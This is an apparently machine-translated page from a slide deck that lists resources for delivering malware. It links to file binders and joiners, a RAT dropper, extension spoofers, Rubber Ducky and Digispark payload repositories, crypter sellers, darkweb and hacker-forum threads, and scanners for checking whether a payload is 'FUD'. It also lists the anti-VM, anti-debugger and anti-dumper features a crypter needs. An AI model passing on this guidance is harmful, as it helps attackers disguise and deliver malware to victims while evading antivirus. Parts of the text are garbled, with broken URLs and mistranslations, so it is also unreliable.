https://github.com/93aef0ce4dd141ece6f5/File-Binder Simple and generates a stub
https://github.com/NAWAK01/WinRAT classic dropper on command
Spoofers and diapers:
https://github.com/henriksb/ExtensionSpoofer
https://github.com/AHXR/maskedkitty
https://mega.nz/#!NxZACbJA!me-l4SBMoMkAGqbg1rwIVBLINeNvudC21NEBuskrsxU
https//www.forw.forw.forw.for showthread.php? t = 996627
51

Glue / Joiner
Joiner by Blade, SuperGlue, MicroJoiner, Juntador
https://github.com/danielhnmoreno/pyJoiner
https://www.exejoiner.com/
Delivery
Online
Formats: Doc, Docx, Rtf.
Options: Social engineering, exploits in versions of
Obfuscation is often used when delivering documents.
Oﬄine
Options: Social Engineering, Equipment Capture, Access
Rubber duckyAbility
https://github.com/SkiddieTech/UAC-DE-Rubber-Ducky
https://github.com/hak5darren/USB-Rubber-Ducky
52

Digispark
https: // github.com/CedArctic/DigiSpark-Scripts
Ninja cable
https://usbninja.com/
In oﬄine delivery, you can and should use spoofers.
What should be in the cryptor to secure
Anti Ring3 Hooks, Anti Emulator, Anti Debugger, Anti Dumper, Anti VM / SandBox
It can also give false positive antivirus - you should also understand this.
• Paid services
https://theoldphantom.net/
https://spartanproducts.net/
http://staticsoftwares.pro/
• People
https://bhf.io/threads/ 534014 /
https://lolzteam.org/threads/964713/
53

https://darkwebs.cc/threads/95571/
https://darkwebs.cc/threads/749 46 /
https://lolzteam.org/threads/314158/
• Free services
http://virtualcrypt.xyz/
https://www.crypter.com/download.html
• crypto Crypto Forums
http://shanghaiblackgoons.com/ crypters /
http://www.blackhatrussia.com/crypters/
https://zhacker.net/crypter/
https://ifud.ws/forums/kriptory-jojnery.2/
• Where can I check FUD
https: // nodistribute. com
https://antiscan.me/
https://run4me.net/
Additionally
Information on what things aﬀect detections from md5 to behavior and icons.
https://github.com/vulnz/false-positive-executed
https://ifud.ws/threads/exel-b-kurs-videourokov-krehkerstvo-programmirovanie-2017-pcrec.13022/ Exelab
courses + software
54

Pt08 19 final1

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (19)

Similar a Pt08 19 final1

Similar a Pt08 19 final1 (20)

Más de Francisco Santibañez

Más de Francisco Santibañez (20)

Último

Último (20)

Pt08 19 final1